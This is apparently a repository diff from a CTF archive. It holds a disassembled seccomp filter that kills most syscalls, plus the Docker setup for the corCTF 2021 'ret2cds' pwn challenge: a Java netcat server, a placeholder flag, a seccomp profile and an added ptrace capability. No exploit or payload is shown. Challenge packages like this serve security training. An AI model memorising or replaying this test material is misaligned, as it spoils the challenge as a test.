0212: 0x15 0x00 0x01 0x0000006e if (A != getppid) goto 0214
0213: 0x06 0x00 0x00 0x00000000 return KILL
0214: 0x15 0x00 0x01 0x0000006f if (A != getpgrp) goto 0216
0215: 0x06 0x00 0x00 0x00000000 return KILL
0216: 0x15 0x00 0x01 0x00000070 if (A != setsid) goto 0218
0217: 0x06 0x00 0x00 0x00000000 return KILL
0218: 0x15 0x00 0x01 0x00000071 if (A != setreuid) goto 0220
0219: 0x06 0x00 0x00 0x00000000 return KILL
0220: 0x15 0x00 0x01 0x00000072 if (A != setregid) goto 0222
0221: 0x06 0x00 0x00 0x00000000 return KILL
0222: 0x15 0x00 0x01 0x00000073 if (A != getgroups) goto 0224
0223: 0x06 0x00 0x00 0x00000000 return KILL
0224: 0x15 0x00 0x01 0x00000074 if (A != setgroups) goto 0226
0225: 0x06 0x00 0x00 0x00000000 return KILL
0226: 0x15 0x00 0x01 0x00000075 if (A != setresuid) goto 0228
0227: 0x06 0x00 0x00 0x00000000 return KILL
0228: 0x15 0x00 0x01 0x00000076 if (A != getresuid) goto 0230
0229: 0x06 0x00 0x00 0x00000000 return KILL
0230: 0x15 0x00 0x01 0x00000077 if (A != setresgid) goto 0232
0231: 0x06 0x00 0x00 0x00000000 return KILL
0232: 0x15 0x00 0x01 0x00000078 if (A != getresgid) goto 0234
0233: 0x06 0x00 0x00 0x00000000 return KILL
0234: 0x15 0x00 0x01 0x00000079 if (A != getpgid) goto 0236
0235: 0x06 0x00 0x00 0x00000000 return KILL
0236: 0x15 0x00 0x01 0x0000007a if (A != setfsuid) goto 0238
0237: 0x06 0x00 0x00 0x00000000 return KILL
0238: 0x15 0x00 0x01 0x0000007b if (A != setfsgid) goto 0240
0239: 0x06 0x00 0x00 0x00000000 return KILL
0240: 0x15 0x00 0x01 0x0000007c if (A != getsid) goto 0242
0241: 0x06 0x00 0x00 0x00000000 return KILL
0242: 0x15 0x00 0x01 0x0000007d if (A != capget) goto 0244
0243: 0x06 0x00 0x00 0x00000000 return KILL
0244: 0x15 0x00 0x01 0x0000007e if (A != capset) goto 0246
0245: 0x06 0x00 0x00 0x00000000 return KILL
0246: 0x15 0x00 0x01 0x0000007f if (A != rt_sigpending) goto 0248
0247: 0x06 0x00 0x00 0x00000000 return KILL
0248: 0x15 0x00 0x01 0x00000080 if (A != rt_sigtimedwait) goto 0250
0249: 0x06 0x00 0x00 0x00000000 return KILL
0250: 0x15 0x00 0x01 0x00000081 if (A != rt_sigqueueinfo) goto 0252
0251: 0x06 0x00 0x00 0x00000000 return KILL
0252: 0x15 0x00 0x01 0x00000082 if (A != rt_sigsuspend) goto 0254
0253: 0x06 0x00 0x00 0x00000000 return KILL
0254: 0x15 0x00 0x01 0x00000083 if (A != sigaltstack) goto 0256
0255: 0x06 0x00 0x00 0x00000000 return KILL
0256: 0x15 0x00 0x01 0x00000084 if (A != utime) goto 0258
0257: 0x06 0x00 0x00 0x00000000 return KILL
0258: 0x15 0x00 0x01 0x00000085 if (A != mknod) goto 0260
0259: 0x06 0x00 0x00 0x00000000 return KILL
0260: 0x15 0x00 0x01 0x00000086 if (A != uselib) goto 0262
0261: 0x06 0x00 0x00 0x00000000 return KILL
0262: 0x15 0x00 0x01 0x00000087 if (A != personality) goto 0264
0263: 0x06 0x00 0x00 0x00000000 return KILL
0264: 0x15 0x00 0x01 0x00000088 if (A != ustat) goto 0266
0265: 0x06 0x00 0x00 0x00000000 return KILL
0266: 0x15 0x00 0x01 0x00000089 if (A != statfs) goto 0268
0267: 0x06 0x00 0x00 0x00000000 return KILL
0268: 0x15 0x00 0x01 0x0000008a if (A != fstatfs) goto 0270
0269: 0x06 0x00 0x00 0x00000000 return KILL
0270: 0x15 0x00 0x01 0x0000008b if (A != sysfs) goto 0272
0271: 0x06 0x00 0x00 0x00000000 return KILL
0272: 0x15 0x00 0x01 0x0000008c if (A != getpriority) goto 0274
0273: 0x06 0x00 0x00 0x00000000 return KILL
0274: 0x15 0x00 0x01 0x0000008d if (A != setpriority) goto 0276
0275: 0x06 0x00 0x00 0x00000000 return KILL
0276: 0x15 0x00 0x01 0x0000008e if (A != sched_setparam) goto 0278
0277: 0x06 0x00 0x00 0x00000000 return KILL
0278: 0x15 0x00 0x01 0x0000008f if (A != sched_getparam) goto 0280
0279: 0x06 0x00 0x00 0x00000000 return KILL
0280: 0x15 0x00 0x01 0x00000090 if (A != sched_setscheduler) goto 0282
0281: 0x06 0x00 0x00 0x00000000 return KILL
0282: 0x15 0x00 0x01 0x00000091 if (A != sched_getscheduler) goto 0284
0283: 0x06 0x00 0x00 0x00000000 return KILL
0284: 0x15 0x00 0x01 0x00000092 if (A != sched_get_priority_max) goto 0286
0285: 0x06 0x00 0x00 0x00000000 return KILL
0286: 0x15 0x00 0x01 0x00000093 if (A != sched_get_priority_min) goto 0288
0287: 0x06 0x00 0x00 0x00000000 return KILL
0288: 0x15 0x00 0x01 0x00000094 if (A != sched_rr_get_interval) goto 0290
0289: 0x06 0x00 0x00 0x00000000 return KILL
0290: 0x15 0x00 0x01 0x00000095 if (A != mlock) goto 0292
0291: 0x06 0x00 0x00 0x00000000 return KILL
0292: 0x15 0x00 0x01 0x00000096 if (A != munlock) goto 0294
0293: 0x06 0x00 0x00 0x00000000 return KILL
0294: 0x15 0x00 0x01 0x00000097 if (A != mlockall) goto 0296
0295: 0x06 0x00 0x00 0x00000000 return KILL
0296: 0x15 0x00 0x01 0x00000098 if (A != munlockall) goto 0298
0297: 0x06 0x00 0x00 0x00000000 return KILL
0298: 0x15 0x00 0x01 0x00000099 if (A != vhangup) goto 0300
0299: 0x06 0x00 0x00 0x00000000 return KILL
0300: 0x15 0x00 0x01 0x0000009a if (A != modify_ldt) goto 0302
0301: 0x06 0x00 0x00 0x00000000 return KILL
0302: 0x15 0x00 0x01 0x0000009b if (A != pivot_root) goto 0304
0303: 0x06 0x00 0x00 0x00000000 return KILL
0304: 0x15 0x00 0x01 0x0000009c if (A != _sysctl) goto 0306
0305: 0x06 0x00 0x00 0x00000000 return KILL
0306: 0x15 0x00 0x01 0x0000009d if (A != prctl) goto 0308
0307: 0x06 0x00 0x00 0x00000000 return KILL
0308: 0x15 0x00 0x01 0x0000009e if (A != arch_prctl) goto 0310
0309: 0x06 0x00 0x00 0x00000000 return KILL
0310: 0x15 0x00 0x01 0x0000009f if (A != adjtimex) goto 0312
0311: 0x06 0x00 0x00 0x00000000 return KILL
0312: 0x15 0x00 0x01 0x000000a0 if (A != setrlimit) goto 0314
0313: 0x06 0x00 0x00 0x00000000 return KILL
0314: 0x15 0x00 0x01 0x000000a1 if (A != chroot) goto 0316
0315: 0x06 0x00 0x00 0x00000000 return KILL
0316: 0x15 0x00 0x01 0x000000a2 if (A != sync) goto 0318
0317: 0x06 0x00 0x00 0x00000000 return KILL
0318: 0x15 0x00 0x01 0x000000a3 if (A != acct) goto 0320
0319: 0x06 0x00 0x00 0x00000000 return KILL
0320: 0x15 0x00 0x01 0x000000a4 if (A != settimeofday) goto 0322
0321: 0x06 0x00 0x00 0x00000000 return KILL
0322: 0x15 0x00 0x01 0x000000a5 if (A != mount) goto 0324
0323: 0x06 0x00 0x00 0x00000000 return KILL
0324: 0x15 0x00 0x01 0x000000a6 if (A != umount2) goto 0326
0325: 0x06 0x00 0x00 0x00000000 return KILL
0326: 0x15 0x00 0x01 0x000000a7 if (A != swapon) goto 0328
0327: 0x06 0x00 0x00 0x00000000 return KILL
0328: 0x15 0x00 0x01 0x000000a8 if (A != swapoff) goto 0330
0329: 0x06 0x00 0x00 0x00000000 return KILL
0330: 0x15 0x00 0x01 0x000000aa if (A != sethostname) goto 0332
0331: 0x06 0x00 0x00 0x00000000 return KILL
0332: 0x15 0x00 0x01 0x000000ab if (A != setdomainname) goto 0334
0333: 0x06 0x00 0x00 0x00000000 return KILL
0334: 0x15 0x00 0x01 0x000000ac if (A != iopl) goto 0336
0335: 0x06 0x00 0x00 0x00000000 return KILL
0336: 0x15 0x00 0x01 0x000000ad if (A != ioperm) goto 0338
0337: 0x06 0x00 0x00 0x00000000 return KILL
0338: 0x15 0x00 0x01 0x000000ae if (A != create_module) goto 0340
0339: 0x06 0x00 0x00 0x00000000 return KILL
0340: 0x15 0x00 0x01 0x000000af if (A != init_module) goto 0342
0341: 0x06 0x00 0x00 0x00000000 return KILL
0342: 0x15 0x00 0x01 0x000000b0 if (A != delete_module) goto 0344
0343: 0x06 0x00 0x00 0x00000000 return KILL
0344: 0x15 0x00 0x01 0x000000b1 if (A != get_kernel_syms) goto 0346
0345: 0x06 0x00 0x00 0x00000000 return KILL
0346: 0x15 0x00 0x01 0x000000b2 if (A != query_module) goto 0348
0347: 0x06 0x00 0x00 0x00000000 return KILL
0348: 0x15 0x00 0x01 0x000000b3 if (A != quotactl) goto 0350
0349: 0x06 0x00 0x00 0x00000000 return KILL
0350: 0x15 0x00 0x01 0x000000b4 if (A != nfsservctl) goto 0352
0351: 0x06 0x00 0x00 0x00000000 return KILL
0352: 0x15 0x00 0x01 0x000000b5 if (A != getpmsg) goto 0354
0353: 0x06 0x00 0x00 0x00000000 return KILL
0354: 0x15 0x00 0x01 0x000000b6 if (A != putpmsg) goto 0356
0355: 0x06 0x00 0x00 0x00000000 return KILL
0356: 0x15 0x00 0x01 0x000000b7 if (A != afs_syscall) goto 0358
0357: 0x06 0x00 0x00 0x00000000 return KILL
0358: 0x15 0x00 0x01 0x000000b8 if (A != tuxcall) goto 0360
0359: 0x06 0x00 0x00 0x00000000 return KILL
0360: 0x15 0x00 0x01 0x000000b9 if (A != security) goto 0362
0361: 0x06 0x00 0x00 0x00000000 return KILL
0362: 0x15 0x00 0x01 0x000000ba if (A != gettid) goto 0364
0363: 0x06 0x00 0x00 0x00000000 return KILL
0364: 0x15 0x00 0x01 0x000000bb if (A != readahead) goto 0366
0365: 0x06 0x00 0x00 0x00000000 return KILL
0366: 0x15 0x00 0x01 0x000000bc if (A != setxattr) goto 0368
0367: 0x06 0x00 0x00 0x00000000 return KILL
0368: 0x15 0x00 0x01 0x000000bd if (A != lsetxattr) goto 0370
0369: 0x06 0x00 0x00 0x00000000 return KILL
0370: 0x15 0x00 0x01 0x000000be if (A != fsetxattr) goto 0372
0371: 0x06 0x00 0x00 0x00000000 return KILL
0372: 0x15 0x00 0x01 0x000000bf if (A != getxattr) goto 0374
0373: 0x06 0x00 0x00 0x00000000 return KILL
0374: 0x15 0x00 0x01 0x000000c0 if (A != lgetxattr) goto 0376
0375: 0x06 0x00 0x00 0x00000000 return KILL
0376: 0x15 0x00 0x01 0x000000c1 if (A != fgetxattr) goto 0378
0377: 0x06 0x00 0x00 0x00000000 return KILL
0378: 0x15 0x00 0x01 0x000000c2 if (A != listxattr) goto 0380
0379: 0x06 0x00 0x00 0x00000000 return KILL
0380: 0x15 0x00 0x01 0x000000c3 if (A != llistxattr) goto 0382
0381: 0x06 0x00 0x00 0x00000000 return KILL
0382: 0x15 0x00 0x01 0x000000c4 if (A != flistxattr) goto 0384
0383: 0x06 0x00 0x00 0x00000000 return KILL
0384: 0x15 0x00 0x01 0x000000c5 if (A != removexattr) goto 0386
0385: 0x06 0x00 0x00 0x00000000 return KILL
0386: 0x15 0x00 0x01 0x000000c6 if (A != lremovexattr) goto 0388
0387: 0x06 0x00 0x00 0x00000000 return KILL
0388: 0x15 0x00 0x01 0x000000c7 if (A != fremovexattr) goto 0390
0389: 0x06 0x00 0x00 0x00000000 return KILL
0390: 0x15 0x00 0x01 0x000000c8 if (A != tkill) goto 0392
0391: 0x06 0x00 0x00 0x00000000 return KILL
0392: 0x15 0x00 0x01 0x000000c9 if (A != time) goto 0394
0393: 0x06 0x00 0x00 0x00000000 return KILL
0394: 0x15 0x00 0x01 0x000000ca if (A != futex) goto 0396
0395: 0x06 0x00 0x00 0x00000000 return KILL
0396: 0x15 0x00 0x01 0x000000cb if (A != sched_setaffinity) goto 0398
0397: 0x06 0x00 0x00 0x00000000 return KILL
0398: 0x15 0x00 0x01 0x000000cc if (A != sched_getaffinity) goto 0400
0399: 0x06 0x00 0x00 0x00000000 return KILL
0400: 0x15 0x00 0x01 0x000000cd if (A != set_thread_area) goto 0402
0401: 0x06 0x00 0x00 0x00000000 return KILL
0402: 0x15 0x00 0x01 0x000000ce if (A != io_setup) goto 0404
0403: 0x06 0x00 0x00 0x00000000 return KILL
0404: 0x15 0x00 0x01 0x000000cf if (A != io_destroy) goto 0406
0405: 0x06 0x00 0x00 0x00000000 return KILL
0406: 0x15 0x00 0x01 0x000000d0 if (A != io_getevents) goto 0408
0407: 0x06 0x00 0x00 0x00000000 return KILL
0408: 0x15 0x00 0x01 0x000000d1 if (A != io_submit) goto 0410
0409: 0x06 0x00 0x00 0x00000000 return KILL
0410: 0x15 0x00 0x01 0x000000d2 if (A != io_cancel) goto 0412
0411: 0x06 0x00 0x00 0x00000000 return KILL
0412: 0x15 0x00 0x01 0x000000d3 if (A != get_thread_area) goto 0414
0413: 0x06 0x00 0x00 0x00000000 return KILL
0414: 0x15 0x00 0x01 0x000000d4 if (A != lookup_dcookie) goto 0416
0415: 0x06 0x00 0x00 0x00000000 return KILL
0416: 0x15 0x00 0x01 0x000000d5 if (A != epoll_create) goto 0418
0417: 0x06 0x00 0x00 0x00000000 return KILL
0418: 0x15 0x00 0x01 0x000000d6 if (A != epoll_ctl_old) goto 0420
0419: 0x06 0x00 0x00 0x00000000 return KILL
0420: 0x15 0x00 0x01 0x000000d7 if (A != epoll_wait_old) goto 0422
0421: 0x06 0x00 0x00 0x00000000 return KILL
0422: 0x15 0x00 0x01 0x000000d8 if (A != remap_file_pages) goto 0424
0423: 0x06 0x00 0x00 0x00000000 return KILL
0424: 0x15 0x00 0x01 0x000000d9 if (A != getdents64) goto 0426
0425: 0x06 0x00 0x00 0x00000000 return KILL
0426: 0x15 0x00 0x01 0x000000da if (A != set_tid_address) goto 0428
0427: 0x06 0x00 0x00 0x00000000 return KILL
0428: 0x15 0x00 0x01 0x000000db if (A != restart_syscall) goto 0430
0429: 0x06 0x00 0x00 0x00000000 return KILL
0430: 0x15 0x00 0x01 0x000000dc if (A != semtimedop) goto 0432
0431: 0x06 0x00 0x00 0x00000000 return KILL
0432: 0x15 0x00 0x01 0x000000dd if (A != fadvise64) goto 0434
0433: 0x06 0x00 0x00 0x00000000 return KILL
0434: 0x15 0x00 0x01 0x000000de if (A != timer_create) goto 0436
0435: 0x06 0x00 0x00 0x00000000 return KILL
0436: 0x15 0x00 0x01 0x000000df if (A != timer_settime) goto 0438
0437: 0x06 0x00 0x00 0x00000000 return KILL
0438: 0x15 0x00 0x01 0x000000e0 if (A != timer_gettime) goto 0440
0439: 0x06 0x00 0x00 0x00000000 return KILL
0440: 0x15 0x00 0x01 0x000000e1 if (A != timer_getoverrun) goto 0442
0441: 0x06 0x00 0x00 0x00000000 return KILL
0442: 0x15 0x00 0x01 0x000000e2 if (A != timer_delete) goto 0444
0443: 0x06 0x00 0x00 0x00000000 return KILL
0444: 0x15 0x00 0x01 0x000000e3 if (A != clock_settime) goto 0446
0445: 0x06 0x00 0x00 0x00000000 return KILL
0446: 0x15 0x00 0x01 0x000000e4 if (A != clock_gettime) goto 0448
0447: 0x06 0x00 0x00 0x00000000 return KILL
0448: 0x15 0x00 0x01 0x000000e5 if (A != clock_getres) goto 0450
0449: 0x06 0x00 0x00 0x00000000 return KILL
0450: 0x15 0x00 0x01 0x000000e6 if (A != clock_nanosleep) goto 0452
0451: 0x06 0x00 0x00 0x00000000 return KILL
0452: 0x15 0x00 0x01 0x000000e8 if (A != epoll_wait) goto 0454
0453: 0x06 0x00 0x00 0x00000000 return KILL
0454: 0x15 0x00 0x01 0x000000e9 if (A != epoll_ctl) goto 0456
0455: 0x06 0x00 0x00 0x00000000 return KILL
0456: 0x15 0x00 0x01 0x000000ea if (A != tgkill) goto 0458
0457: 0x06 0x00 0x00 0x00000000 return KILL
0458: 0x15 0x00 0x01 0x000000eb if (A != utimes) goto 0460
0459: 0x06 0x00 0x00 0x00000000 return KILL
0460: 0x15 0x00 0x01 0x000000ec if (A != vserver) goto 0462
0461: 0x06 0x00 0x00 0x00000000 return KILL
0462: 0x15 0x00 0x01 0x000000ed if (A != mbind) goto 0464
0463: 0x06 0x00 0x00 0x00000000 return KILL
0464: 0x15 0x00 0x01 0x000000ee if (A != set_mempolicy) goto 0466
0465: 0x06 0x00 0x00 0x00000000 return KILL
0466: 0x15 0x00 0x01 0x000000ef if (A != get_mempolicy) goto 0468
0467: 0x06 0x00 0x00 0x00000000 return KILL
0468: 0x15 0x00 0x01 0x000000f0 if (A != mq_open) goto 0470
0469: 0x06 0x00 0x00 0x00000000 return KILL
0470: 0x15 0x00 0x01 0x000000f1 if (A != mq_unlink) goto 0472
0471: 0x06 0x00 0x00 0x00000000 return KILL
0472: 0x15 0x00 0x01 0x000000f2 if (A != mq_timedsend) goto 0474
0473: 0x06 0x00 0x00 0x00000000 return KILL
0474: 0x15 0x00 0x01 0x000000f3 if (A != mq_timedreceive) goto 0476
0475: 0x06 0x00 0x00 0x00000000 return KILL
0476: 0x15 0x00 0x01 0x000000f4 if (A != mq_notify) goto 0478
0477: 0x06 0x00 0x00 0x00000000 return KILL
0478: 0x15 0x00 0x01 0x000000f5 if (A != mq_getsetattr) goto 0480
0479: 0x06 0x00 0x00 0x00000000 return KILL
0480: 0x15 0x00 0x01 0x000000f6 if (A != kexec_load) goto 0482
0481: 0x06 0x00 0x00 0x00000000 return KILL
0482: 0x15 0x00 0x01 0x000000f7 if (A != waitid) goto 0484
0483: 0x06 0x00 0x00 0x00000000 return KILL
0484: 0x15 0x00 0x01 0x000000f8 if (A != add_key) goto 0486
0485: 0x06 0x00 0x00 0x00000000 return KILL
0486: 0x15 0x00 0x01 0x000000f9 if (A != request_key) goto 0488
0487: 0x06 0x00 0x00 0x00000000 return KILL
0488: 0x15 0x00 0x01 0x000000fa if (A != keyctl) goto 0490
0489: 0x06 0x00 0x00 0x00000000 return KILL
0490: 0x15 0x00 0x01 0x000000fb if (A != ioprio_set) goto 0492
0491: 0x06 0x00 0x00 0x00000000 return KILL
0492: 0x15 0x00 0x01 0x000000fc if (A != ioprio_get) goto 0494
0493: 0x06 0x00 0x00 0x00000000 return KILL
0494: 0x15 0x00 0x01 0x000000fd if (A != inotify_init) goto 0496
0495: 0x06 0x00 0x00 0x00000000 return KILL
0496: 0x15 0x00 0x01 0x000000fe if (A != inotify_add_watch) goto 0498
0497: 0x06 0x00 0x00 0x00000000 return KILL
0498: 0x15 0x00 0x01 0x000000ff if (A != inotify_rm_watch) goto 0500
0499: 0x06 0x00 0x00 0x00000000 return KILL
0500: 0x15 0x00 0x01 0x00000100 if (A != migrate_pages) goto 0502
0501: 0x06 0x00 0x00 0x00000000 return KILL
0502: 0x15 0x00 0x01 0x00000101 if (A != openat) goto 0504
0503: 0x06 0x00 0x00 0x00000000 return KILL
0504: 0x15 0x00 0x01 0x00000102 if (A != mkdirat) goto 0506
0505: 0x06 0x00 0x00 0x00000000 return KILL
0506: 0x15 0x00 0x01 0x00000103 if (A != mknodat) goto 0508
0507: 0x06 0x00 0x00 0x00000000 return KILL
0508: 0x15 0x00 0x01 0x00000104 if (A != fchownat) goto 0510
0509: 0x06 0x00 0x00 0x00000000 return KILL
0510: 0x15 0x00 0x01 0x00000105 if (A != futimesat) goto 0512
0511: 0x06 0x00 0x00 0x00000000 return KILL
0512: 0x15 0x00 0x01 0x00000106 if (A != newfstatat) goto 0514
0513: 0x06 0x00 0x00 0x00000000 return KILL
0514: 0x15 0x00 0x01 0x00000107 if (A != unlinkat) goto 0516
0515: 0x06 0x00 0x00 0x00000000 return KILL
0516: 0x15 0x00 0x01 0x00000108 if (A != renameat) goto 0518
0517: 0x06 0x00 0x00 0x00000000 return KILL
0518: 0x15 0x00 0x01 0x00000109 if (A != linkat) goto 0520
0519: 0x06 0x00 0x00 0x00000000 return KILL
0520: 0x15 0x00 0x01 0x0000010a if (A != symlinkat) goto 0522
0521: 0x06 0x00 0x00 0x00000000 return KILL
0522: 0x15 0x00 0x01 0x0000010b if (A != readlinkat) goto 0524
0523: 0x06 0x00 0x00 0x00000000 return KILL
0524: 0x15 0x00 0x01 0x0000010c if (A != fchmodat) goto 0526
0525: 0x06 0x00 0x00 0x00000000 return KILL
0526: 0x15 0x00 0x01 0x0000010d if (A != faccessat) goto 0528
0527: 0x06 0x00 0x00 0x00000000 return KILL
0528: 0x15 0x00 0x01 0x0000010e if (A != pselect6) goto 0530
0529: 0x06 0x00 0x00 0x00000000 return KILL
0530: 0x15 0x00 0x01 0x0000010f if (A != ppoll) goto 0532
0531: 0x06 0x00 0x00 0x00000000 return KILL
0532: 0x15 0x00 0x01 0x00000110 if (A != unshare) goto 0534
0533: 0x06 0x00 0x00 0x00000000 return KILL
0534: 0x15 0x00 0x01 0x00000111 if (A != set_robust_list) goto 0536
0535: 0x06 0x00 0x00 0x00000000 return KILL
0536: 0x15 0x00 0x01 0x00000112 if (A != get_robust_list) goto 0538
0537: 0x06 0x00 0x00 0x00000000 return KILL
0538: 0x15 0x00 0x01 0x00000113 if (A != splice) goto 0540
0539: 0x06 0x00 0x00 0x00000000 return KILL
0540: 0x15 0x00 0x01 0x00000114 if (A != tee) goto 0542
0541: 0x06 0x00 0x00 0x00000000 return KILL
0542: 0x15 0x00 0x01 0x00000115 if (A != sync_file_range) goto 0544
0543: 0x06 0x00 0x00 0x00000000 return KILL
0544: 0x15 0x00 0x01 0x00000116 if (A != vmsplice) goto 0546
0545: 0x06 0x00 0x00 0x00000000 return KILL
0546: 0x15 0x00 0x01 0x00000117 if (A != move_pages) goto 0548
0547: 0x06 0x00 0x00 0x00000000 return KILL
0548: 0x15 0x00 0x01 0x00000118 if (A != utimensat) goto 0550
0549: 0x06 0x00 0x00 0x00000000 return KILL
0550: 0x15 0x00 0x01 0x00000119 if (A != epoll_pwait) goto 0552
0551: 0x06 0x00 0x00 0x00000000 return KILL
0552: 0x15 0x00 0x01 0x0000011a if (A != signalfd) goto 0554
0553: 0x06 0x00 0x00 0x00000000 return KILL
0554: 0x15 0x00 0x01 0x0000011b if (A != timerfd) goto 0556
0555: 0x06 0x00 0x00 0x00000000 return KILL
0556: 0x15 0x00 0x01 0x0000011c if (A != eventfd) goto 0558
0557: 0x06 0x00 0x00 0x00000000 return KILL
0558: 0x15 0x00 0x01 0x0000011d if (A != fallocate) goto 0560
0559: 0x06 0x00 0x00 0x00000000 return KILL
0560: 0x15 0x00 0x01 0x0000011e if (A != timerfd_settime) goto 0562
0561: 0x06 0x00 0x00 0x00000000 return KILL
0562: 0x15 0x00 0x01 0x0000011f if (A != timerfd_gettime) goto 0564
0563: 0x06 0x00 0x00 0x00000000 return KILL
0564: 0x15 0x00 0x01 0x00000120 if (A != accept4) goto 0566
0565: 0x06 0x00 0x00 0x00000000 return KILL
0566: 0x15 0x00 0x01 0x00000121 if (A != signalfd4) goto 0568
0567: 0x06 0x00 0x00 0x00000000 return KILL
0568: 0x15 0x00 0x01 0x00000122 if (A != eventfd2) goto 0570
0569: 0x06 0x00 0x00 0x00000000 return KILL
0570: 0x15 0x00 0x01 0x00000123 if (A != epoll_create1) goto 0572
0571: 0x06 0x00 0x00 0x00000000 return KILL
0572: 0x15 0x00 0x01 0x00000124 if (A != dup3) goto 0574
0573: 0x06 0x00 0x00 0x00000000 return KILL
0574: 0x15 0x00 0x01 0x00000125 if (A != pipe2) goto 0576
0575: 0x06 0x00 0x00 0x00000000 return KILL
0576: 0x15 0x00 0x01 0x00000126 if (A != inotify_init1) goto 0578
0577: 0x06 0x00 0x00 0x00000000 return KILL
0578: 0x15 0x00 0x01 0x00000127 if (A != preadv) goto 0580
0579: 0x06 0x00 0x00 0x00000000 return KILL
0580: 0x15 0x00 0x01 0x00000128 if (A != pwritev) goto 0582
0581: 0x06 0x00 0x00 0x00000000 return KILL
0582: 0x15 0x00 0x01 0x00000129 if (A != rt_tgsigqueueinfo) goto 0584
0583: 0x06 0x00 0x00 0x00000000 return KILL
0584: 0x15 0x00 0x01 0x0000012a if (A != perf_event_open) goto 0586
0585: 0x06 0x00 0x00 0x00000000 return KILL
0586: 0x15 0x00 0x01 0x0000012b if (A != recvmmsg) goto 0588
0587: 0x06 0x00 0x00 0x00000000 return KILL
0588: 0x15 0x00 0x01 0x0000012c if (A != fanotify_init) goto 0590
0589: 0x06 0x00 0x00 0x00000000 return KILL
0590: 0x15 0x00 0x01 0x0000012d if (A != fanotify_mark) goto 0592
0591: 0x06 0x00 0x00 0x00000000 return KILL
0592: 0x15 0x00 0x01 0x0000012e if (A != prlimit64) goto 0594
0593: 0x06 0x00 0x00 0x00000000 return KILL
0594: 0x15 0x00 0x01 0x0000012f if (A != name_to_handle_at) goto 0596
0595: 0x06 0x00 0x00 0x00000000 return KILL
0596: 0x15 0x00 0x01 0x00000130 if (A != open_by_handle_at) goto 0598
0597: 0x06 0x00 0x00 0x00000000 return KILL
0598: 0x15 0x00 0x01 0x00000131 if (A != clock_adjtime) goto 0600
0599: 0x06 0x00 0x00 0x00000000 return KILL
0600: 0x15 0x00 0x01 0x00000132 if (A != syncfs) goto 0602
0601: 0x06 0x00 0x00 0x00000000 return KILL
0602: 0x15 0x00 0x01 0x00000133 if (A != sendmmsg) goto 0604
0603: 0x06 0x00 0x00 0x00000000 return KILL
0604: 0x15 0x00 0x01 0x00000134 if (A != setns) goto 0606
0605: 0x06 0x00 0x00 0x00000000 return KILL
0606: 0x15 0x00 0x01 0x00000135 if (A != getcpu) goto 0608
0607: 0x06 0x00 0x00 0x00000000 return KILL
0608: 0x15 0x00 0x01 0x00000138 if (A != kcmp) goto 0610
0609: 0x06 0x00 0x00 0x00000000 return KILL
0610: 0x15 0x00 0x01 0x00000139 if (A != finit_module) goto 0612
0611: 0x06 0x00 0x00 0x00000000 return KILL
0612: 0x15 0x00 0x01 0x0000013a if (A != sched_setattr) goto 0614
0613: 0x06 0x00 0x00 0x00000000 return KILL
0614: 0x15 0x00 0x01 0x0000013b if (A != sched_getattr) goto 0616
0615: 0x06 0x00 0x00 0x00000000 return KILL
0616: 0x15 0x00 0x01 0x0000013c if (A != renameat2) goto 0618
0617: 0x06 0x00 0x00 0x00000000 return KILL
0618: 0x15 0x00 0x01 0x0000013d if (A != seccomp) goto 0620
0619: 0x06 0x00 0x00 0x00000000 return KILL
0620: 0x15 0x00 0x01 0x0000013e if (A != getrandom) goto 0622
0621: 0x06 0x00 0x00 0x00000000 return KILL
0622: 0x15 0x00 0x01 0x0000013f if (A != memfd_create) goto 0624
0623: 0x06 0x00 0x00 0x00000000 return KILL
0624: 0x15 0x00 0x01 0x00000140 if (A != kexec_file_load) goto 0626
0625: 0x06 0x00 0x00 0x00000000 return KILL
0626: 0x15 0x00 0x01 0x00000141 if (A != bpf) goto 0628
0627: 0x06 0x00 0x00 0x00000000 return KILL
0628: 0x15 0x00 0x01 0x00000143 if (A != userfaultfd) goto 0630
0629: 0x06 0x00 0x00 0x00000000 return KILL
0630: 0x15 0x00 0x01 0x00000144 if (A != membarrier) goto 0632
0631: 0x06 0x00 0x00 0x00000000 return KILL
0632: 0x15 0x00 0x01 0x00000145 if (A != mlock2) goto 0634
0633: 0x06 0x00 0x00 0x00000000 return KILL
0634: 0x15 0x00 0x01 0x00000146 if (A != copy_file_range) goto 0636
0635: 0x06 0x00 0x00 0x00000000 return KILL
0636: 0x15 0x00 0x01 0x00000147 if (A != preadv2) goto 0638
0637: 0x06 0x00 0x00 0x00000000 return KILL
0638: 0x15 0x00 0x01 0x00000148 if (A != pwritev2) goto 0640
0639: 0x06 0x00 0x00 0x00000000 return KILL
0640: 0x15 0x00 0x01 0x00000149 if (A != pkey_mprotect) goto 0642
0641: 0x06 0x00 0x00 0x00000000 return KILL
0642: 0x15 0x00 0x01 0x0000014a if (A != pkey_alloc) goto 0644
0643: 0x06 0x00 0x00 0x00000000 return KILL
0644: 0x15 0x00 0x01 0x0000014b if (A != pkey_free) goto 0646
0645: 0x06 0x00 0x00 0x00000000 return KILL
0646: 0x15 0x00 0x01 0x0000014c if (A != statx) goto 0648
0647: 0x06 0x00 0x00 0x00000000 return KILL
0648: 0x06 0x00 0x00 0x7fff0000 return ALLOW

24
2021/corctf/ret2cds/challenge/Dockerfile Normal file
View File

@ -0,0 +1,24 @@
FROM ubuntu:20.04
ENV DEBIAN_FRONTEND noninteractive
RUN apt-get update
RUN apt-get install -y openjdk-11-jdk
RUN useradd -m ret2cds
COPY ./chall /home/ret2cds
RUN mkdir /opt/nc-java
COPY ./server /opt/nc-java
RUN chmod 755 /home/ret2cds/*
RUN chmod 754 /home/ret2cds/flag.txt
RUN chmod 755 /opt/nc-java/*
COPY ./start.sh /start.sh
RUN chmod 755 /start.sh
USER ret2cds
CMD ["/start.sh"]

1
2021/corctf/ret2cds/challenge/chall/flag.txt Normal file
View File

@ -0,0 +1 @@
fakeflag

BIN
2021/corctf/ret2cds/challenge/chall/ld-2.31.so Executable file
View File

Binary file not shown.

BIN
2021/corctf/ret2cds/challenge/chall/libc.so.6 Executable file
View File

Binary file not shown.

BIN
2021/corctf/ret2cds/challenge/chall/ret2cds Executable file
View File

Binary file not shown.

11
2021/corctf/ret2cds/challenge/docker-compose.yml Normal file
View File

@ -0,0 +1,11 @@
version: '2.4'
services:
ret2cds:
build: .
ports:
- 1337:1337
restart: always
security_opt:
- seccomp=seccomp.json
cap_add:
- sys_ptrace

1593
2021/corctf/ret2cds/challenge/seccomp.json Normal file
View File

File diff suppressed because it is too large Load Diff

BIN
2021/corctf/ret2cds/challenge/server/nc-java.jar Executable file
View File

Binary file not shown.

BIN
2021/corctf/ret2cds/challenge/server/slf4j-api-1.7.2.jar Executable file
View File

Binary file not shown.

